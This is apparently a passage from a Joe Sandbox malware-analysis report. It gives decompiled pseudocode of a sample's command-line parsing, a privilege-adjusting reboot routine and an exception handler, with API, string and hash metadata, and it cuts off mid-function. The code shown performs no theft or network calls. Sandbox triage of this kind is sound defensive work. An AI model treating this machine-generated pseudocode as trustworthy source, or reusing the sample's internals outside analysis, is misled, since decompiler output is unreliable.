                                                                                                                                                                                                        																	if(E001F5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t202 = 0x104;
                                                                                                                                                                                                        																		E001F1680(0x1f8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t202 = 0x5b;
                                                                                                                                                                                                        																	if(E001F667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L117;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t202 = 0x5d;
                                                                                                                                                                                                        																if(E001F667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L115;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *0x1f8a24 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t100 = _t87 - 1;
                                                                                                                                                                                                        												if(_t100 == 0) {
                                                                                                                                                                                                        													L98:
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t38;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t101 =  *_t192;
                                                                                                                                                                                                        															_t192 = _t192 + 1;
                                                                                                                                                                                                        														} while (_t101 != 0);
                                                                                                                                                                                                        														if(_t192 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t202 =  &_v276;
                                                                                                                                                                                                        															_v276 = _t170;
                                                                                                                                                                                                        															if(E001F5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                        																_t218 = 0x1f8b3e;
                                                                                                                                                                                                        																_t105 = _v276;
                                                                                                                                                                                                        																if(_t104 != 0x54) {
                                                                                                                                                                                                        																	_t218 = 0x1f8a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E001F1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E001F658A(_t218, 0x104, 0x1f1140);
                                                                                                                                                                                                        																if(E001F31E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t111 = _t100 - 0xa;
                                                                                                                                                                                                        													if(_t111 == 0) {
                                                                                                                                                                                                        														if(_v266 != 0) {
                                                                                                                                                                                                        															if(_v266 != 0x3a) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t199 = _v265;
                                                                                                                                                                                                        																if(_t199 != 0) {
                                                                                                                                                                                                        																	_t219 =  &_v265;
                                                                                                                                                                                                        																	do {
                                                                                                                                                                                                        																		_t219 = _t219 + 1;
                                                                                                                                                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                        																		if(_t115 == 0) {
                                                                                                                                                                                                        																			 *0x1f8a2c = 1;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			_t200 = 2;
                                                                                                                                                                                                        																			_t119 = _t115 - _t200;
                                                                                                                                                                                                        																			if(_t119 == 0) {
                                                                                                                                                                                                        																				 *0x1f8a30 = 1;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				if(_t119 == 0xf) {
                                                                                                                                                                                                        																					 *0x1f8a34 = 1;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t209 = 0;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																		_t118 =  *_t219;
                                                                                                                                                                                                        																		_t199 = _t118;
                                                                                                                                                                                                        																	} while (_t118 != 0);
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															 *0x1f8a2c = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L50;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t127 = _t111 - 3;
                                                                                                                                                                                                        														if(_t127 == 0) {
                                                                                                                                                                                                        															if(_v266 != 0) {
                                                                                                                                                                                                        																if(_v266 != 0x3a) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                        																	if(_t129 == 0x31) {
                                                                                                                                                                                                        																		goto L76;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		if(_t129 == 0x41) {
                                                                                                                                                                                                        																			goto L83;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			if(_t129 == 0x55) {
                                                                                                                                                                                                        																				goto L76;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				goto L49;
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																L76:
                                                                                                                                                                                                        																_push(2);
                                                                                                                                                                                                        																_pop(1);
                                                                                                                                                                                                        																L83:
                                                                                                                                                                                                        																 *0x1f8a38 = 1;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L50;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t132 = _t127 - 1;
                                                                                                                                                                                                        															if(_t132 == 0) {
                                                                                                                                                                                                        																if(_v266 != 0) {
                                                                                                                                                                                                        																	if(_v266 != 0x3a) {
                                                                                                                                                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                        																			goto L49;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t201 = _v265;
                                                                                                                                                                                                        																		 *0x1f9a2c = 1;
                                                                                                                                                                                                        																		if(_t201 != 0) {
                                                                                                                                                                                                        																			_t220 =  &_v265;
                                                                                                                                                                                                        																			do {
                                                                                                                                                                                                        																				_t220 = _t220 + 1;
                                                                                                                                                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                        																				if(_t142 == 0) {
                                                                                                                                                                                                        																					_t143 = 2;
                                                                                                                                                                                                        																					 *0x1f9a2c =  *0x1f9a2c | _t143;
                                                                                                                                                                                                        																					goto L70;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t145 = _t142 - 3;
                                                                                                                                                                                                        																					if(_t145 == 0) {
                                                                                                                                                                                                        																						 *0x1f8d48 =  *0x1f8d48 | 0x00000040;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t146 = _t145 - 5;
                                                                                                                                                                                                        																						if(_t146 == 0) {
                                                                                                                                                                                                        																							 *0x1f9a2c =  *0x1f9a2c & 0xfffffffd;
                                                                                                                                                                                                        																							goto L70;
                                                                                                                                                                                                        																						} else {
                                                                                                                                                                                                        																							_t147 = _t146 - 5;
                                                                                                                                                                                                        																							if(_t147 == 0) {
                                                                                                                                                                                                        																								 *0x1f9a2c =  *0x1f9a2c & 0xfffffffe;
                                                                                                                                                                                                        																								goto L70;
                                                                                                                                                                                                        																							} else {
                                                                                                                                                                                                        																								_t149 = _t147;
                                                                                                                                                                                                        																								if(_t149 == 0) {
                                                                                                                                                                                                        																									 *0x1f8d48 =  *0x1f8d48 | 0x00000080;
                                                                                                                                                                                                        																								} else {
                                                                                                                                                                                                        																									if(_t149 == 3) {
                                                                                                                                                                                                        																										 *0x1f9a2c =  *0x1f9a2c | 0x00000004;
                                                                                                                                                                                                        																										L70:
                                                                                                                                                                                                        																										 *0x1f8a28 = 1;
                                                                                                                                                                                                        																									} else {
                                                                                                                                                                                                        																										_t209 = 0;
                                                                                                                                                                                                        																									}
                                                                                                                                                                                                        																								}
                                                                                                                                                                                                        																							}
                                                                                                                                                                                                        																						}
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t144 =  *_t220;
                                                                                                                                                                                                        																				_t201 = _t144;
                                                                                                                                                                                                        																			} while (_t144 != 0);
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	 *0x1f9a2c = 3;
                                                                                                                                                                                                        																	 *0x1f8a28 = 1;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																goto L50;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																if(_t132 == 0) {
                                                                                                                                                                                                        																	goto L98;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	L49:
                                                                                                                                                                                                        																	_t209 = 0;
                                                                                                                                                                                                        																	L50:
                                                                                                                                                                                                        																	_t173 = _v272;
                                                                                                                                                                                                        																	if( *_t173 != 0) {
                                                                                                                                                                                                        																		goto L2;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		break;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L106;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										_t209 = 0;
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0x1f8a2c != 0 &&  *0x1f8b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0x1f9a3c, 0x1f8b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E001F66C8(0x1f8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}


































































                                                                                                                                                                                                        0x001f611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6125
                                                                                                                                                                                                        0x001f6137
                                                                                                                                                                                                        0x001f613a
                                                                                                                                                                                                        0x001f613c
                                                                                                                                                                                                        0x001f613e
                                                                                                                                                                                                        0x001f613e
                                                                                                                                                                                                        0x001f6141
                                                                                                                                                                                                        0x001f6141
                                                                                                                                                                                                        0x001f6143
                                                                                                                                                                                                        0x001f6144
                                                                                                                                                                                                        0x001f614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6150
                                                                                                                                                                                                        0x001f6152
                                                                                                                                                                                                        0x001f615c
                                                                                                                                                                                                        0x001f6170
                                                                                                                                                                                                        0x001f6172
                                                                                                                                                                                                        0x001f617c
                                                                                                                                                                                                        0x001f6190
                                                                                                                                                                                                        0x001f6190
                                                                                                                                                                                                        0x001f6196
                                                                                                                                                                                                        0x001f61a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f61ab
                                                                                                                                                                                                        0x001f61b9
                                                                                                                                                                                                        0x001f61c6
                                                                                                                                                                                                        0x001f61c6
                                                                                                                                                                                                        0x001f617e
                                                                                                                                                                                                        0x001f6180
                                                                                                                                                                                                        0x001f618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f618a
                                                                                                                                                                                                        0x001f615e
                                                                                                                                                                                                        0x001f6160
                                                                                                                                                                                                        0x001f616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f616a
                                                                                                                                                                                                        0x001f615c
                                                                                                                                                                                                        0x001f614a
                                                                                                                                                                                                        0x001f610b
                                                                                                                                                                                                        0x001f610e
                                                                                                                                                                                                        0x001f610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5e59
                                                                                                                                                                                                        0x001f5e59
                                                                                                                                                                                                        0x001f5e5c
                                                                                                                                                                                                        0x001f604f
                                                                                                                                                                                                        0x001f6056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f605c
                                                                                                                                                                                                        0x001f606e
                                                                                                                                                                                                        0x001f6071
                                                                                                                                                                                                        0x001f6073
                                                                                                                                                                                                        0x001f6075
                                                                                                                                                                                                        0x001f6075
                                                                                                                                                                                                        0x001f6078
                                                                                                                                                                                                        0x001f6078
                                                                                                                                                                                                        0x001f607a
                                                                                                                                                                                                        0x001f607b
                                                                                                                                                                                                        0x001f6081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6087
                                                                                                                                                                                                        0x001f6087
                                                                                                                                                                                                        0x001f608d
                                                                                                                                                                                                        0x001f609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f60a2
                                                                                                                                                                                                        0x001f60aa
                                                                                                                                                                                                        0x001f60b2
                                                                                                                                                                                                        0x001f60b7
                                                                                                                                                                                                        0x001f60bd
                                                                                                                                                                                                        0x001f60bf
                                                                                                                                                                                                        0x001f60bf
                                                                                                                                                                                                        0x001f60d6
                                                                                                                                                                                                        0x001f60e0
                                                                                                                                                                                                        0x001f60e7
                                                                                                                                                                                                        0x001f60f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f60f5
                                                                                                                                                                                                        0x001f609c
                                                                                                                                                                                                        0x001f6081
                                                                                                                                                                                                        0x001f5e62
                                                                                                                                                                                                        0x001f5e62
                                                                                                                                                                                                        0x001f5e65
                                                                                                                                                                                                        0x001f5fd3
                                                                                                                                                                                                        0x001f5fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5fef
                                                                                                                                                                                                        0x001f5fef
                                                                                                                                                                                                        0x001f5ff7
                                                                                                                                                                                                        0x001f5ffd
                                                                                                                                                                                                        0x001f6003
                                                                                                                                                                                                        0x001f6006
                                                                                                                                                                                                        0x001f6011
                                                                                                                                                                                                        0x001f6014
                                                                                                                                                                                                        0x001f603d
                                                                                                                                                                                                        0x001f6016
                                                                                                                                                                                                        0x001f6018
                                                                                                                                                                                                        0x001f6019
                                                                                                                                                                                                        0x001f601b
                                                                                                                                                                                                        0x001f6033
                                                                                                                                                                                                        0x001f601d
                                                                                                                                                                                                        0x001f6020
                                                                                                                                                                                                        0x001f6029
                                                                                                                                                                                                        0x001f6022
                                                                                                                                                                                                        0x001f6022
                                                                                                                                                                                                        0x001f6022
                                                                                                                                                                                                        0x001f6020
                                                                                                                                                                                                        0x001f601b
                                                                                                                                                                                                        0x001f6042
                                                                                                                                                                                                        0x001f6044
                                                                                                                                                                                                        0x001f6046
                                                                                                                                                                                                        0x001f604a
                                                                                                                                                                                                        0x001f5ff7
                                                                                                                                                                                                        0x001f5fd5
                                                                                                                                                                                                        0x001f5fd8
                                                                                                                                                                                                        0x001f5fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5e6b
                                                                                                                                                                                                        0x001f5e6b
                                                                                                                                                                                                        0x001f5e6e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 001F5CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(001F8B3E,00000104,00000000,?,?), ref: 001F5DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 001F5E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 001F5EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 001F5F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 001F5FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 001F6008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 001F60AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,001F1140,00000000,00000040,00000000), ref: 001F61F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 001F61F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: cdbdedbbb8b38699275a93bc1dc47b91ff0bc754bfce8852c30961f0c21ada53
                                                                                                                                                                                                        • Instruction ID: 91a3ae11676e241a763a5d2479446c23c191fc12a7ecaac2120a95c726d5ac82
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cdbdedbbb8b38699275a93bc1dc47b91ff0bc754bfce8852c30961f0c21ada53
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AD13B71A08A5C5EDF35CB388C487B67B67AB26304F1840EAD786D7591DB748EC6CB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E001F1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0x1f9a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E001F44B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E001F6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E001F44B9(0, 0x522, 0x1f1140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E001F1EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x001f1fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 001F1EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 001F1F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 001F1FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: d0ccb8fcf9c59dab204502a5979ea36731fe9280c417adf73f7a8dc017a34acc
                                                                                                                                                                                                        • Instruction ID: ca79ae9be7cc1c0d82f254b7f4c17bdfb7cb62e5128b2f732a79f307ebb52305
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ccb8fcf9c59dab204502a5979ea36731fe9280c417adf73f7a8dc017a34acc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C32108B1B4420DFBDB209BA19C4AFBF77B8EF95B10F510018FB06E6581DB788845D661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x001f6cf7
                                                                                                                                                                                                        0x001f6d00
                                                                                                                                                                                                        0x001f6d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001F6E26,001F1000), ref: 001F6CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(001F6E26,?,001F6E26,001F1000), ref: 001F6D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,001F6E26,001F1000), ref: 001F6D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,001F6E26,001F1000), ref: 001F6D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: 178943c7044d576e57bac5de966652ca60131a797fd4d5bbc143bdf6aee25330
                                                                                                                                                                                                        • Instruction ID: 22bd11215e629f3fb3e60994e6d89f4a7a975e67b0e77ce34557fd6b3a72a73b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 178943c7044d576e57bac5de966652ca60131a797fd4d5bbc143bdf6aee25330
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3D0C9B2008108BBDB002BE1EC0CA693F28EF48212F864000F31E82860CA3A9491CB52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E001F3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
